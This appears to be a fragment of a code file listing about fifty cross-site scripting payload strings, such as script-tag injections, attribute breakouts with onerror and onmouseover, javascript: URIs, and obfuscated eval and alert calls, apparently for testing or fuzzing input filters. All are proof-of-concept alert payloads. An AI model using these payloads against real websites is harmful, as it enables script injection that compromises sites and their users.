'"><script>alert(1)</script>',
    '";alert(1);//',
    "';alert(1)//",
    '";alert(String.fromCharCode(88,83,83))//',
    "';alert(String.fromCharCode(88,83,83))//",
    'javascript:alert(1)',
    '`-alert(1)-`',
    '" onmouseover="alert(1)"',
    '\' onmouseover="alert(1)"',
    '" style="xss:expression(alert(1))"',
    "'; this.src='x' onerror='alert(1)' //",
    '"; this.src=\'x\' onerror=alert(1)//',
    '"; this.onerror=alert; throw new Error() //',
    '`;alert(1)//',
    '" onload=alert(1) ',
    "' onerror=alert(1) ",
    "'+alert(1)+'",
    '");alert(1);//',
    'alert(1)//',
    'new Function("alert(1)")',
    'eval("alert(1)")',
    'Function("alert(1)")()',
    'setTimeout("alert(1)",1000)',
    'setInterval("alert(1)",1000)',
    'window["al"+"ert"](1)',
    'this["alert"](1)',
    '(()=>alert(1))()',
    '(function(){alert(1)})()',
    'var f = alert; f(1);',
    '(()=>{eval("alert(1)")})()',
    'console.log("xss");alert(1);',
    'let x = "alert"; eval(x+"(1)")',
    'document.write("<script>alert(1)</script>")',
    'alert`${1}`',
    'confirm(1)',
    'prompt(1)',
    'fetch("/").then(()=>alert(1))',
    'import("data:text/javascript,alert(1)")',
    'navigator.sendBeacon("javascript:alert(1)")',
    'new Image().src="x"; alert(1)',
    'top["al"+"ert"](1)',
    'parent["alert"](1)',
    'frames[0].alert(1)',
    'alert.call(null,1)',
    '(alert)(1)',
    'location=`javascript:alert(1)`',
    'new Function`alert(1)`()',
    'alert(...[1])'